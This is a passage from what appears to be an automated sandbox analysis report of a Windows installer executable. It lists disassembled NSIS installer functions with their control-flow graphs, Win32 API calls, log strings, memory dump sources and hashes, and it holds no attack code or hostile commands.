                                                                                                                                                                                                                                                                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                                    • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                                    • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                                    • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                                    • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                                    • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                                    • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                                    • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                                                    • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                                    • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                                                                                                                                                                                    Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                                    • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                                                                                                                                                                                    Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                                    • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                                    • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                                                    • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                    • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                                                                                                                                                                                    Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042777E,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                                                                                                                                                                                                                                                                    • API String ID: 4286501637-2478300759
                                                                                                                                                                                                                                                                                                    • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                                    • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                                                                                                                                                                                    Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                                    • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                                    • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                                    • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                                    • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                                    • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                                                                                                                                                                                    Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
